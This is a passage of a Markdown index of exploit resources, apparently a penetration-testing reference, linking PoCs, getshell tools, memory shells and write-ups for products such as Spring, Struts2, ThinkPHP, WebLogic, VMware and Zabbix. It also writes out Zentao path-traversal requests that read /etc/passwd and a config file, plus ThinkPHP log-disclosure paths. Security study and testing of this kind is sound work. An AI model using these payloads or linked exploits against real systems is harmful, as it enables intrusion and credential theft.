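[CAPTCHA bypass and multiple back-end injections in the latest 6.8.3 version of a certain Server CMS](https://xz.aliyun.com/t/4119)

[Brief notes on the SiteServer remote template download getshell vulnerability captured in the wild during incident response](https://www.freebuf.com/articles/web/195105.html)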

[zhaoweiho/SiteServer-CMS-Remote-download-Getshell](https://github.com/zhaoweiho/SiteServer-CMS-Remote-download-Getshell)

## Sophos Firewall

[CVE-2022-1040](https://github.com/killvxk/CVE-2022-1040)

## Spring

[CVE-2022-22947 Spring Cloud Gateway remote code execution vulnerability reproduction](https://mp.weixin.qq.com/s/5ZBpVTofGpG_ssz2iPeI2A)

[Spring-cloud-function SpEL RCE, Vultarget & Poc](https://github.com/cckuailong/spring-cloud-function-SpEL-RCE)

[SpringBootVulExploit](https://github.com/LandGrey/SpringBootVulExploit)

[A tool for rapid exploitation of the SpringBootEnv page](https://github.com/0x727/SpringBootExploit)

[Spring exploits](https://github.com/Crush-sudo/pocsuite/tree/master/Spring)

[Techniques for turning the Spring Boot fat JAR arbitrary file write vulnerability into stable RCE](https://github.com/LandGrey/spring-boot-upload-file-lead-to-rce-tricks)

[Spring scanner](https://github.com/0xsp-SRD/OffensivePascal/tree/main/SpringCore-Scanner)

[HeapDump sensitive information extraction tool](https://github.com/whwlsfb/JDumpSpider)

[Common Java web vulnerabilities and secure code, based on Spring Boot and Spring Security](https://github.com/JoyChou93/java-sec-code)

[Spring Boot vulnerability study materials, collection of exploitation methods and techniques, black-box security assessment checklist](https://github.com/LandGrey/SpringBootVulExploit)

## Struts2

[Struts2 all-vulnerability scanning and exploitation tool](https://github.com/HatBoy/Struts2-Scan)

[Struts vulnerability source code](https://github.com/xhycccc/Struts2-Vuln-Demo)

[S2-062 (CVE-2021-31805) / S2-061 / S2-059 RCE](https://github.com/Wrin9/CVE-2021-31805)

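[Remote code execution S2-062 CVE-2021-31805 verification PoC](https://github.com/YanMu2020/s2-062)

[Struts2 all-version vulnerability detection and exploitation tool written in Python 2](https://github.com/Lucifer1993/struts-scan)

[Struts2 vulnerability series checking tool](https://github.com/shack2/Struts2VulsTools)

[Golang Struts2 vulnerability scanning and exploitation tool](https://github.com/x51/STS2G)

[Struts2: bypassing WAFs to read and write files, and alternative ways to execute commands](https://f0ng.github.io/2022/04/14/struts2绕过waf读写文件及另类方式执行命令/)

[Struts2 vulnerability scanning Burp plugin](https://github.com/novysodope/ST2Scanner)

[A Burp passive-scanning plugin for detecting Struts2 RCE vulnerabilities; it only checks requests whose URL suffix is .do or .action](https://github.com/x1a0t/Struts2Burp)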

## ThinkAdmin

[ThinkAdminV6 unauthorized access and arbitrary file viewing vulnerability reproduction](https://blog.csdn.net/Adminxe/article/details/108744912)

[thinkAdmin framework 0day](https://mp.weixin.qq.com/s?__biz=Mzg3NTk4MzY0MA==&mid=2247485677&idx=1&sn=3c2ae67b8958a0325701139210dd58e8)

## ThinkCMF

[ThinkCMF arbitrary content inclusion getshell vulnerability](https://www.hacking8.com/bug-web/ThinkCMF/ThinkCMF-框架上的任意内容包含漏洞.html)

[jas502n/ThinkCMF_getshell](https://github.com/jas502n/ThinkCMF_getshell)

## Thinkphp

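[Practical tips | Using a ThinkPHP 5.X bug to disclose database information](https://mp.weixin.qq.com/s/B9jkF0e0SMTJ6r09Syy-8A)

[ThinkPHP5 MySQL account and password disclosure vulnerability](https://mp.weixin.qq.com/s/R11Ha6ksbd7kslAuhyy73Q)

[Improper use of ThinkPHP may lead to sensitive information disclosure](https://blog.csdn.net/Fly_hps/article/details/81201904)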

[https://mp.weixin.qq.com/s/1ZkiKqHogWOy0U4rQNnGtQ](https://mp.weixin.qq.com/s/1ZkiKqHogWOy0U4rQNnGtQ)

Log disclosure

```
/Application/Runtime/Logs/Home/16_09_06.log # "Application" may differ, e.g. App
/Runtime/Logs/Home/16_09_06.log # year_month_day
/Runtime/Logs/User/16_09_06.log # year_month_day
```

[ThinkphpGUI](https://github.com/Lotus6/ThinkphpGUI)

[ThinkPHP6 session arbitrary file creation vulnerability reproduction, with PoC](https://mp.weixin.qq.com/s/8k96KSpWMk7S4-_TzweXxg)

[One-click ThinkPHP vulnerability detection](https://github.com/Lucifer1993/TPscan)

[ThinkPHP5 RCE vulnerability detection tool](https://github.com/theLSA/tp5-getshell)

[ThinkPHP RCE scanning script, with log scanning](https://github.com/sukabuliet/ThinkphpRCE)

[tangxiaofeng7/TPScan](https://github.com/tangxiaofeng7/TPScan)

[ThinkPHP comprehensive vulnerability exploitation tool: GUI, command execution, one-click getshell, batch detection, log traversal, session inclusion, BaoTa (BT Panel) bypass](https://github.com/bewhale/thinkphp_gui_tools)

## Tomcat

[Ready-to-use Listener/Filter/Servlet memory shells for Tomcat 7/8/9/10, supporting injection of CMD and Behinder memory shells](https://github.com/ce-automne/TomcatMemShell)

[Apache Tomcat JMXProxy RCE](https://github.com/4ra1n/tomcat-jmxproxy-rce-exp)

[CVE-2022-26377: when proxy_ajp is used to reverse-proxy Tomcat AJP, crafted AJP packets can attack back-end services](http://noahblog.360.cn/apache-httpd-ajp-request-smuggling/)

[CVE-2022-29885: denial-of-service vulnerability in the Apache Tomcat cluster service Listener](https://voidzone.me/cve-2022-29885-apache-tomcat-cluster-service-dos/)

[A Python script for scanning Apache Tomcat servers for vulnerabilities.](https://github.com/p0dalirius/ApacheTomcatScanner)

## TP-Link

[CVE-2022-25064 TP-LINK TL-WR840N RCE](https://github.com/Mr-xn/CVE-2022-25064)

## Ueditor

[Summary of Baidu UEditor editor vulnerabilities](https://mp.weixin.qq.com/s/mH4GWTVoCel4KHva-I4Elw)

[UEditor 1.4.3.3: verifying the SSRF vulnerability and improving the DNS rebinding success rate](https://jianfensec.com/渗透测试/UEditor 1.4.3.3验证SSRF漏洞提高DNS rebinding成功率/)

[Jiuwei Team - Green Team (improvement) | Java code audit: SSRF](https://mp.weixin.qq.com/s/bF7wJpbN4BmvT8viWGW7hw)

[When UEditor meets a certain "Shield"](https://mp.weixin.qq.com/s/Lf3lMzlpBq7Vq5nDf_pUcw)

[UEditor editor vulnerability (file upload)](https://www.jianshu.com/p/681162ed0374)

[theLSA/ueditor-getshell](https://github.com/theLSA/ueditor-getshell)

## Vmware

[CVE-2021-21974 VMWare ESXi RCE Exploit](https://github.com/Shadow0ps/CVE-2021-21974)

[CVE-2021-21972-vCenter-6.5-7.0-RCE-POC](https://github.com/QmF0c3UK/CVE-2021-21972-vCenter-6.5-7.0-RCE-POC)

[Exploiting CVE-2021-44228 in VMWare Horizon for remote code execution and more](https://github.com/puzzlepeaches/Log4jHorizon)

[SharpSphere](https://github.com/JamesCooteUK/SharpSphere)

[VMWare vRealize SSRF-CVE-2021-21975](https://github.com/Henry4E36/VMWare-vRealize-SSRF)

[Vmware vhost password decrypt](https://github.com/shmilylty/vhost_password_decrypt)

[PoC for CVE-2022-22972, affecting VMware Workspace ONE, vIDM and vRealize Automation 7.6.](https://github.com/horizon3ai/CVE-2022-22972)

[.NET project for attacking vCenter](https://github.com/JamesCooteUK/SharpSphere)

[Tool that extracts the IdP certificate from a vCenter backup and logs in as administrator](https://github.com/horizon3ai/vcenter_saml_login)

[Vcenter Server CVE-2021-21985 RCE PAYLOAD](https://iswin.org/2021/06/02/Vcenter-Server-CVE-2021-21985-RCE-PAYLOAD/)

[CVE-2021-21985 (Vulnerable Code)](https://github.com/alt3kx/CVE-2021-21985_PoC)

[Summary of real-world exploitation of VMware vCenter vulnerabilities](https://www.ctfiot.com/39518.html)

[Summary of real-world vCenter exploitation methods](https://forum.butian.net/share/1893)

## VMware VRealize Network Insight

[VMWare vRealize Network Insight Pre-Authenticated RCE (CVE-2023-20887)](https://github.com/sinsinology/CVE-2023-20887)

## Weblogic

[weblogic t3 deserialization rce](https://github.com/5up3rc/weblogic_cmd)

[Fileless memory shell for WebLogic and Tomcat](https://github.com/keven1z/weblogic_memshell)

[WebLogic vulnerability detection](https://github.com/0nise/weblogic-framework)

[CVE-2018-3245-PoC](https://github.com/pyn3rd/CVE-2018-3245)

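[WebLogic one-click vulnerability detection tool, V1.5, updated: 20200730](https://github.com/rabbitmask/WeblogicScan)

[WeblogicTool: GUI exploitation tool supporting vulnerability detection, command execution, memory shell injection, password decryption and more (powered by the Tianwei Team of Sangfor Deep Blue Lab)](https://github.com/KimJun1010/WeblogicTool)

[CVE-2020-14882&CVE-2020-14883 WebLogic unauthenticated remote command execution vulnerability](https://www.cnblogs.com/liliyuanshangcao/p/13962160.html)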

## Webmin

[KrE80r/webmin_cve-2019-12840_poc](https://github.com/KrE80r/webmin_cve-2019-12840_poc)

[vulhub/webmin/CVE-2019-15107/README.zh-cn.md](https://github.com/vulhub/vulhub/blob/master/webmin/CVE-2019-15107/README.zh-cn.md)

[jas502n/CVE-2019-15642](https://github.com/jas502n/CVE-2019-15642)

## Websphere

[IBM Websphere Portal - Persistent Cross-Site Scripting](https://www.exploit-db.com/exploits/36941)

[websphere_rce.py](https://github.com/Coalfire-Research/java-deserialization-exploits/blob/master/WebSphere/websphere_rce.py)

[websphereCVE-2015-7450](http://www.zstreamer.cn/2020/07/19/websphere-cve-2015-7450/)

[WebSphere ND remote command execution analysis and constructing the RpcServerDispatcher payload (CVE-2019-4279)](https://xz.aliyun.com/t/6394)

[WebSphere XXE vulnerability analysis (CVE-2020-4643)](https://paper.seebug.org/1342/)

[Turning bad SSRF to good SSRF: Websphere Portal](https://blog.assetnote.io/2021/12/26/chained-ssrf-websphere/)

## Wso2

[WSO2 RCE (CVE-2022-29464) exploit](https://github.com/hakivvi/CVE-2022-29464)

## XXL-JOB

[XXL-JOB default accessToken authentication bypass vulnerability](https://blog.csdn.net/qq_41904294/article/details/134201486)

[XXL-JOB in-depth exploitation](https://mp.weixin.qq.com/s?__biz=MzkyNzYxMDQ2MQ==&mid=2247483934&idx=1&sn=2de580591b3a2a850560ffa6e62b4d01)

## Yii

[CVE-2020-15148 Yii2 deserialization RCE POP chain analysis](https://mp.weixin.qq.com/s/NHBpF446yKQbRTiNQr8ztA)

[Maskhe/CVE-2020-15148-bypasses](https://github.com/Maskhe/CVE-2020-15148-bypasses)

## Zabbix

[Zabbix Saml Bypass](https://github.com/Henry4E36/zabbix-saml-bypass)

[Zabbix latest.php SQL injection vulnerability (CVE-2016-10134)](https://vulhub.org/#/environments/zabbix/CVE-2016-10134/)

[Zabbix SQL injection vulnerability reproduction (CVE-2016-10134)](https://mp.weixin.qq.com/s/Gi3NMbZcgMutE8mNqCmNAw)

[CVE-2020-11800 Zabbix RCE vulnerability details disclosed](https://xz.aliyun.com/t/8991)

[CVE-2021-27927: Zabbix-CSRF-to-RCE](https://mp.weixin.qq.com/s/eyVwNKRfWpSGNA7Gq8KpWA)

[CVE-2022-23131 Zabbix SAML SSO authentication bypass vulnerability analysis and reproduction](https://mp.weixin.qq.com/s/-TAUjvdigi9TzjoPpMe1kw)

[Mr-xn/cve-2022-23131](https://github.com/Mr-xn/cve-2022-23131)

[CVE-2022-23134 Zabbix vulnerability analysis, part 2: from unauthorized access to taking over the admin back end](https://mp.weixin.qq.com/s/jq2AvDlHCosb3zViPXGTaQ)

## Zentao

CNVD-2020-65242 back-end arbitrary file download

```
index.php?m=file&f=sendDownHeader&fileName=2&fileType=1&content=/etc/passwd&type=file
index.php?m=file&f=sendDownHeader&fileName=2&fileType=1&content=./../../config/my.php&type=file
```

Arbitrary file download via the downloadXxdPackage function of the back-end im module

```
index.php?m=im&f=downloadXxdPackage&xxdFileName=../../../../../../../../../etc/passwd
```

[Zentao v16.5 SQL Injection POC](https://github.com/z92g/ZentaoSqli/blob/master/CNVD-2022-42853.go)

[Zentao 12.4.2 getshell with back-end administrator privileges, reproduction](https://mp.weixin.qq.com/s/Uak631OOC48WcshaYnvsRQ)